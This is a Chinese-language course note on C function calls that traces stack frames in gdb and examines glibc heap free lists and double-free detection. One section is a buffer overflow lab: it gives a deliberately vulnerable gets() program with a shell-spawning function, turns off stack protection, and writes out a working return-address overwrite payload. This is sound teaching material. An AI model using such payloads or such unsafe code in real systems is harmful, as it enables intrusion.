[你所不知道的 C 語言: 函式呼叫篇](https://hackmd.io/s/SJ6hRj-zg)

# [你所不知道的 C 語言: 函式呼叫篇](https://hackmd.io/s/SJ6hRj-zg) Contributed by < [`dange0`](https://github.com/dange0) > ###### tags: `sysprog2018` ## Function 定義 - 在數學上可以接受多個 input 對應到一個 output - Function Composition：函數本身可以組合 - $g \circ f(x) = g(f(x))$ ## Process 和 C 程式的關聯 - MMIO(memory mapped I/O) - The address space is shared between memory and I/O devices. - 要做 I/O devices 操作時，直接透過記憶體映射的方式對裝置做存取 - Operating System - 扮演應用程式與硬體之間的橋樑 - MMU(Memory Management Unit) - 將虛擬記憶體轉換為實體記憶體 - 保護資源 - Address Space Isolation - 將 Process 或 I/O devices 的有效記憶體位置做區隔 - Symbol - 將人類可看懂得東西對映到一個地址 - Stack - 紀錄 return address, arguments, temporary variables, context ## Stack ### Stack 名詞解釋 - rip：instruction pointer，用於記錄下一個要執行的instruction - rsp：stack pointer，指向stack頂端 - rbp：base pointer，指向stack底部 ![](https://i.imgur.com/S5QUT5I.png) ### 動態追蹤 Stack 在這邊用一個小範例來看看stack是如何操作 ```clike= int funcA(int b){ return funcB(b); } int funcB(int a){ return a+1 ; } int main(){ int a = funcA(1); return 0; } ``` 編譯時加上 `-g` 以方便觀察 ```shell $ gcc -o stack -g stack.c ``` 透過 gdb 打開之後，使用 `disas` 將其反組譯 ```shell= gdb-peda$ disas main Dump of assembler code for function main: 0x0000000000400501 <+0>: push rbp 0x0000000000400502 <+1>: mov rbp,rsp 0x0000000000400505 <+4>: sub rsp,0x10 0x0000000000400509 <+8>: mov edi,0x1 0x000000000040050e <+13>: call 0x4004d6 <funcA> 0x0000000000400513 <+18>: mov DWORD PTR [rbp-0x4],eax 0x0000000000400516 <+21>: mov eax,0x0 0x000000000040051b <+26>: leave 0x000000000040051c <+27>: ret End of assembler dump. gdb-peda$ disas funcA Dump of assembler code for function funcA: 0x00000000004004d6 <+0>: push rbp 0x00000000004004d7 <+1>: mov rbp,rsp 0x00000000004004da <+4>: sub rsp,0x10 0x00000000004004de <+8>: mov DWORD PTR [rbp-0x4],edi 0x00000000004004e1 <+11>: mov eax,DWORD PTR [rbp-0x4] 0x00000000004004e4 <+14>: mov edi,eax 0x00000000004004e6 <+16>: mov eax,0x0 0x00000000004004eb <+21>: call 0x4004f2 <funcB> 0x00000000004004f0 <+26>: leave 0x00000000004004f1 <+27>: ret End of assembler dump. gdb-peda$ disas funcB Dump of assembler code for function funcB: 0x00000000004004f2 <+0>: push rbp 0x00000000004004f3 <+1>: mov rbp,rsp 0x00000000004004f6 <+4>: mov DWORD PTR [rbp-0x4],edi 0x00000000004004f9 <+7>: mov eax,DWORD PTR [rbp-0x4] 0x00000000004004fc <+10>: add eax,0x1 0x00000000004004ff <+13>: pop rbp 0x0000000000400500 <+14>: ret End of assembler dump. ``` 這邊 Assembly Language 表示法使用的是 Intel Syntax 而非 AT&T Syntax，其差異可以參考 [Intel and AT&T Syntax.](https://imada.sdu.dk/Employees/kslarsen-bak/Courses/dm18-2007-spring/Litteratur/IntelnATT.htm) 因為要觀察的是進入 function 時 stack 的操作因此將中斷點斷在進入 func() 之前也就是第7行的位置 ```shell gdb-peda$ b *0x000000000040050e Breakpoint 1 at 0x4004ec: file stack.c, line 6. gdb-peda$ r ``` ```shell gdb-peda$ p $rbp $1 = (void *) 0x7fffffffe480 gdb-peda$ p $rsp $2 = (void *) 0x7fffffffe470 ``` 此時 stack 長的如下： ![](https://i.imgur.com/V7MJUpb.png =400x) 在執行 call funcA 之後， call instruction 會做 push next instruction address 也就是回到 main 的 return address > call funcA >![](https://i.imgur.com/kO1gVlK.png =400x) 接著進入 funcA()，其 instruction 操作如下： ```shell Dump of assembler code for function funcA: 0x00000000004004d6 <+0>: push rbp 0x00000000004004d7 <+1>: mov rbp,rsp 0x00000000004004da <+4>: sub rsp,0x10 0x00000000004004de <+8>: mov DWORD PTR [rbp-0x4],edi 0x00000000004004e1 <+11>: mov eax,DWORD PTR [rbp-0x4] 0x00000000004004e4 <+14>: mov edi,eax 0x00000000004004e6 <+16>: mov eax,0x0 0x00000000004004eb <+21>: call 0x4004f2 <funcB> 0x00000000004004f0 <+26>: leave 0x00000000004004f1 <+27>: ret End of assembler dump. ``` >push rbp >![](https://i.imgur.com/vQDaJW8.png =400x) >mov rbp,rsp >![](https://i.imgur.com/Os3TyG0.png =400x) >sub rsp,0x10 >![](https://i.imgur.com/EdzoTsU.png =400x) 到這邊基本上 funcA 的 stack frame 就已經完成了在 function return 時，funcA 會呼叫 leave，其效果如下： ``` mov rsp, rbp pop rbp ``` > mov rsp, rbp > ![](https://i.imgur.com/i2bu0fR.png =400x) > pop rbp > ![](https://i.imgur.com/WbNusOO.png =400x) 此時 rsp 已經指向 main 的 return address 了，接著呼叫 ret 時，rip就會指向 return address，並且將 stack frame 的狀態回復到 main 的 stack frame > ret > ![](https://i.imgur.com/3ewDJv8.png =400x) :::info 在這邊比較 funcA 與 funcB 之差異，發現funcA於第五行的位置有 `sub rsp, 0x10`的動作，而 funcB 卻沒有。這邊推論是因為在編譯時期， compiler 就知道 funcB之後就不會在呼叫別的函式了，也沒有 push pop 等操作，因此 `rsp` 也不需要特別拉出一段空間保留給 funcB。 ```shell= gdb-peda$ disas funcA Dump of assembler code for function funcA: 0x00000000004004d6 <+0>: push rbp 0x00000000004004d7 <+1>: mov rbp,rsp 0x00000000004004da <+4>: sub rsp,0x10 0x00000000004004de <+8>: mov DWORD PTR [rbp-0x4],edi 0x00000000004004e1 <+11>: mov eax,DWORD PTR [rbp-0x4] 0x00000000004004e4 <+14>: mov edi,eax 0x00000000004004e6 <+16>: mov eax,0x0 0x00000000004004eb <+21>: call 0x4004f2 <funcB> 0x00000000004004f0 <+26>: leave 0x00000000004004f1 <+27>: ret End of assembler dump. gdb-peda$ disas funcB Dump of assembler code for function funcB: 0x00000000004004f2 <+0>: push rbp 0x00000000004004f3 <+1>: mov rbp,rsp 0x00000000004004f6 <+4>: mov DWORD PTR [rbp-0x4],edi 0x00000000004004f9 <+7>: mov eax,DWORD PTR [rbp-0x4] 0x00000000004004fc <+10>: add eax,0x1 0x00000000004004ff <+13>: pop rbp 0x0000000000400500 <+14>: ret End of assembler dump. ``` ::: :::warning Question: :question: 在聽老師[課程影片:1h26m41s](https://youtu.be/X5hOAFCxOTA?t=1h26m41s)中提到透過 `0x7fffffffdde8` 返回地址找到上一層 stack frame 的位置 `0x7fffffffde08`。但我對 stack frame 之認知應該是透過 **old rbp** 去記錄 stack frame 的位置，也就是用 `push rbp` 去記錄上一個 function 的 stack frame 位置，然後透過 `pop rbp` 去還原上一個 stack frame 之狀態，**返回地址**應該是用於記錄 return function 的 address，不知這樣的理解是否有錯誤呢？ stack frame 之範圍於 [System V Application Binary Interface AMD64 Architecture Processor Supplement](https://github.com/hjl-tools/x86-psABI/wiki/x86-64-psABI-1.0.pdf) 中定義為： ![](https://i.imgur.com/Fec7Vyx.png) ::: ### Buffer Overflow - Baby Jump bof.c ```clike= int evil(){ system("/bin/sh"); } int main(){ char input[10]; puts("Input:"); gets(input); puts(input); } ``` 這段程式碼是為了要展示最基本的 buffer overflow 是如何達成攻擊。由第8行可以看到，被攻擊者使用了缺乏長度檢查的函式 `gets()`，此外上面有一個函式會去執行 `/bin/sh`，雖然使用者在一般情境無法合法的呼叫他，但是卻可以透過 buffer overflow 達到改變程式流程，並觸發這個危險的函式。首先，我們先將程式做編譯。這邊需要特別注意的是，我們需要加上 `-fno-stack-protector` 以關閉`CANNARY`這個記憶體保護機制，相關的記憶體保護機制會在後面稍做介紹。 ```shell $gcc -o bof -fno-stack-protector -g bof.c ``` 接著可以嘗試觀察這之程式的行為，可以發現程式的行為非常單純，他會將你的輸入照實的印出來，這麼單純的程式裡頭到底暗藏的什麼玄機就讓我們繼續看下去！ ```shell $ ./bof Input: abc abc ``` #### Why Segmentation fault? 接著可以嘗試對這支程式做一些粗暴的事情：用超過長度的字串塞爆他。 ```shell $ gdb -q bof gdb-peda$ r Input: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Program received signal SIGSEGV, Segmentation fault. ``` 這支程式不負眾望的 crash 了，並顯示 `Segmentation fault`，這邊就非常值得大家探討了，我們可以先看一下維基百科對於`Segmentation fault`之解釋： :::info 記憶體區段錯誤（英語：Segmentation fault，經常被縮寫為segfault），又譯為記憶體段錯誤，也稱存取權限衝突（access violation），是一種程式錯誤。它會出現在當程式企圖存取CPU無法定址的記憶體區段時。 ::: 為什麼塞過多的摻數進去，會與非法記憶體存取有關。透過 GDB 去觀看其中玄機。 ```shell gdb-peda$ x/16g input 0x7fffffffe470: 0x6161616161616161 0x6161616161616161 0x7fffffffe480: 0x6161616161616161 0x6161616161616161 0x7fffffffe490: 0x6161616161616161 0x6161616161616161 0x7fffffffe4a0: 0x6161616161616161 0x6161616161616161 0x7fffffffe4b0: 0x6161616161616161 0x0061616161616161 0x7fffffffe4c0: 0x00000000004004c0 0x00007fffffffe560 0x7fffffffe4d0: 0x0000000000000000 0x0000000000000000 0x7fffffffe4e0: 0x06fe5dce4008e824 0x06fe4d7426f8e824 ``` 可以看到在記憶體中塞了滿滿的 `0x61` ，也就是我們剛剛輸入的 `a`。在上面的 stack 介紹中曾經提到區域變數會被存放於 stack 中，因此 `input` 這個區域變數是位於 main function 的 stack 中。而位於 `stack` 最頂端的是 function 的 `return address` 因此我們可以懷疑應該是輸入的 `a` 蓋到 `return address` 導致 `rip` 指到無法訪問的地方。將中斷點下在 `main+53` 的位置，並觀察接下來 `rsp`，也就是位於 `return address` 的值 ```shell gdb-peda$ pd main Dump of assembler code for function main: 0x00000000004005cc <+0>: push rbp 0x00000000004005cd <+1>: mov rbp,rsp 0x00000000004005d0 <+4>: sub rsp,0x10 0x00000000004005d4 <+8>: mov edi,0x40069c 0x00000000004005d9 <+13>: call 0x400470 <puts@plt> 0x00000000004005de <+18>: lea rax,[rbp-0x10] 0x00000000004005e2 <+22>: mov rdi,rax 0x00000000004005e5 <+25>: mov eax,0x0 0x00000000004005ea <+30>: call 0x4004a0 <gets@plt> 0x00000000004005ef <+35>: lea rax,[rbp-0x10] 0x00000000004005f3 <+39>: mov rdi,rax 0x00000000004005f6 <+42>: call 0x400470 <puts@plt> 0x00000000004005fb <+47>: mov eax,0x0 0x0000000000400600 <+52>: leave => 0x0000000000400601 <+53>: ret End of assembler dump. gdb-peda$ b *0x0000000000400601 Breakpoint 1 at 0x400601: file bof.c, line 10. gdb-peda$ c Continuing. gdb-peda$ p $rsp $7 = (void *) 0x7fffffffe488 gdb-peda$ x/g 0x7fffffffe488 0x7fffffffe488: 0x6161616161616161 ``` 可以看到 `return address` 指向 0x6161616161616161 ```shell gdb-peda$ vmmap Start End Perm Name 0x00400000 0x00401000 r-xp /tmp/bof 0x00600000 0x00601000 r--p /tmp/bof 0x00601000 0x00602000 rw-p /tmp/bof 0x00602000 0x00623000 rw-p [heap] 0x00007ffff7a0d000 0x00007ffff7bcd000 r-xp /lib/x86_64-linux-gnu/libc-2.23.so 0x00007ffff7bcd000 0x00007ffff7dcd000 ---p /lib/x86_64-linux-gnu/libc-2.23.so 0x00007ffff7dcd000 0x00007ffff7dd1000 r--p /lib/x86_64-linux-gnu/libc-2.23.so 0x00007ffff7dd1000 0x00007ffff7dd3000 rw-p /lib/x86_64-linux-gnu/libc-2.23.so 0x00007ffff7dd3000 0x00007ffff7dd7000 rw-p mapped 0x00007ffff7dd7000 0x00007ffff7dfd000 r-xp /lib/x86_64-linux-gnu/ld-2.23.so 0x00007ffff7fea000 0x00007ffff7fed000 rw-p mapped 0x00007ffff7ff8000 0x00007ffff7ffa000 r--p [vvar] 0x00007ffff7ffa000 0x00007ffff7ffc000 r-xp [vdso] 0x00007ffff7ffc000 0x00007ffff7ffd000 r--p /lib/x86_64-linux-gnu/ld-2.23.so 0x00007ffff7ffd000 0x00007ffff7ffe000 rw-p /lib/x86_64-linux-gnu/ld-2.23.so 0x00007ffff7ffe000 0x00007ffff7fff000 rw-p mapped 0x00007ffffffde000 0x00007ffffffff000 rw-p [stack] 0xffffffffff600000 0xffffffffff601000 r-xp [vsyscall] ``` 使用 `vmmap` 看可以得知 `0x6161616161616161` 並不屬於該程式可以存取之範圍，所以才會彈出 `Segmentation fault` 可以推斷在 `gets(input)` 之後之記憶體狀況如下圖： ![](https://i.imgur.com/qeuZwPx.png =400x) #### Return to evil() 既然我們可以把 `rip` 導到 `0x6161616161616161` 讓他崩潰，為何不將他導到 evil() 呢？ ```shell gdb-peda$ p evil $15 = {int ()} 0x4005b6 <evil> ``` x86-64是以`little endian` 將值存放於記憶體中，因此我們必須先將 0x4005b6 轉換為 little endian 的表示法：`\xb6\x05@\x00\x00\x00\x00\x00` 接著還缺到 return address 的 offset，因此可以回到 GDB 中計算。為了方便計算這邊的輸入值為依序輸入 abc...xyz ```shell gdb-peda$ r Input: abcdefghijklmnopqsttuvwxyzabcdefghijklmnop abcdefghijklmnopqsttuvwxyzabcdefghijklmnop Program received signal SIGSEGV, Segmentation fault. gdb-peda$ p $rsp $3 = (void *) 0x7fffffffe488 gdb-peda$ x/s 0x7fffffffe488 0x7fffffffe488: "yzabcdefghijklmnop" ``` 看到 $rsp 的第一個字為 `y` ，掐指一算 'y' 之前有 24 個字母，也就是我們需要塞 24 個值才碰的到 return address，利用得到的資訊撰寫以下 exploit，並成功執行 `/bin/sh` ``` $ echo -ne "aaaaaaaaaaaaaaaaaaaaaaaa\xb6\x05@\x00\x00\x00\x00\x00" > payload $ cat payload - | ./bof Input: aaaaaaaaaaaaaaaaaaaaaaaa▒@ whoami ubuntu pwd /tmp ``` 其stack 結構如下： ![](https://i.imgur.com/y5qUs7Y.png =400x) ## Heap - malloc alignment - 系統為了加速實做，因此在配置記憶體時，都會多分配一些以方便對齊 - 所以在 free() 的時候無法指定大小，否則多配置的記憶體會沒有被釋放掉 ### double free 是如何被偵測的呢？ ```clike= #include <stdlib.h> int main() { int *a = (int *) malloc(100); free(a); int *b = (int *) malloc(100); free(b); return 0; } ``` 使用 GBD，觀察 `int *a = (int *) malloc(100);` 的結果: ```shell gdb-peda$ p a $3 = (int *) 0x602010 ``` 接著觀察 `int *b = (int *) malloc(100);` 的結果: ```shell gdb-peda$ p b $4 = (int *) 0x602010 ``` 發現，系統為了加速效能，因此在 free 時，系統並不會馬上把之前 malloc 出來的 chunk 歸還給系統，反而是進行集中管理，並在下一次程式 malloc 一樣大小的 chunk 時，直接將預先分配好的空間分配給 malloc 請求者。接著嘗試觀察被free 調的 chunk 都跑去哪裡了呢？ ```clike #include <stdlib.h> int main() { int *a = (int *) malloc(50); int *b = (int *) malloc(50); int *c = (int *) malloc(50); int *d = (int *) malloc(50); int *e = (int *) malloc(50); free(a); free(b); free(c); free(d); free(e); return 0; } ``` 將中斷點設在 free 之前： ```shell gdb-peda$ p a $11 = (int *) 0x602010 gdb-peda$ p b $12 = (int *) 0x602050 gdb-peda$ p c $13 = (int *) 0x602090 gdb-peda$ p d $14 = (int *) 0x6020d0 gdb-peda$ p e $15 = (int *) 0x602110 gdb-peda$ x/50gx 0x602000 0x602000: 0x0000000000000000 0x0000000000000041 0x602010: 0x0000000000000000 0x0000000000000000 0x602020: 0x0000000000000000 0x0000000000000000 0x602030: 0x0000000000000000 0x0000000000000000 0x602040: 0x0000000000000000 0x0000000000000041 0x602050: 0x0000000000000000 0x0000000000000000 0x602060: 0x0000000000000000 0x0000000000000000 0x602070: 0x0000000000000000 0x0000000000000000 0x602080: 0x0000000000000000 0x0000000000000041 0x602090: 0x0000000000000000 0x0000000000000000 0x6020a0: 0x0000000000000000 0x0000000000000000 0x6020b0: 0x0000000000000000 0x0000000000000000 0x6020c0: 0x0000000000000000 0x0000000000000041 0x6020d0: 0x0000000000000000 0x0000000000000000 0x6020e0: 0x0000000000000000 0x0000000000000000 0x6020f0: 0x0000000000000000 0x0000000000000000 0x602100: 0x0000000000000000 0x0000000000000041 0x602110: 0x0000000000000000 0x0000000000000000 0x602120: 0x0000000000000000 0x0000000000000000 0x602130: 0x0000000000000000 0x0000000000000000 0x602140: 0x0000000000000000 0x0000000000020ec1 0x602150: 0x0000000000000000 0x0000000000000000 0x602160: 0x0000000000000000 0x0000000000000000 0x602170: 0x0000000000000000 0x0000000000000000 0x602180: 0x0000000000000000 0x0000000000000000 ``` 將中斷點設在 return 之前： ```shell gdb-peda$ x/50gx 0x602000 0x602000: 0x0000000000000000 0x0000000000000041 <- chunk a free 0x602010: 0x0000000000000000 0x0000000000000000 0x602020: 0x0000000000000000 0x0000000000000000 0x602030: 0x0000000000000000 0x0000000000000000 0x602040: 0x0000000000000000 0x0000000000000041 <- chunk b free 0x602050: [0x0000000000602000] 0x0000000000000000 0x602060: 0x0000000000000000 0x0000000000000000 0x602070: 0x0000000000000000 0x0000000000000000 0x602080: 0x0000000000000000 0x0000000000000041 <- chunk c free 0x602090: [0x0000000000602040] 0x0000000000000000 0x6020a0: 0x0000000000000000 0x0000000000000000 0x6020b0: 0x0000000000000000 0x0000000000000000 0x6020c0: 0x0000000000000000 0x0000000000000041 <- chunk d free 0x6020d0: [0x0000000000602080] 0x0000000000000000 0x6020e0: 0x0000000000000000 0x0000000000000000 0x6020f0: 0x0000000000000000 0x0000000000000000 0x602100: 0x0000000000000000 0x0000000000000041 <- chunk e free 0x602110: [0x00000000006020c0] 0x0000000000000000 0x602120: 0x0000000000000000 0x0000000000000000 0x602130: 0x0000000000000000 0x0000000000000000 0x602140: 0x0000000000000000 0x0000000000020ec1 <- top chunk 0x602150: 0x0000000000000000 0x0000000000000000 0x602160: 0x0000000000000000 0x0000000000000000 0x602170: 0x0000000000000000 0x0000000000000000 0x602180: 0x0000000000000000 0x0000000000000000 ``` - 用`[ ]` 刮起來的部分為 link list 串連的地址 - 為了方便管理 free 出來的 chunk， glibc 會去將一些特定大小的 chunk 做集中管理，其集中管理的機制又分為：`fast bin` `small bin` `large bin` 等等 - [Bins and Chunks](https://heap-exploitation.dhavalkapil.com/diving_into_glibc_heap/bins_chunks.html) 因此推斷 double free 的檢查機制是透過檢查所要 free 的 chunk 是否屬於集中管理的 chunk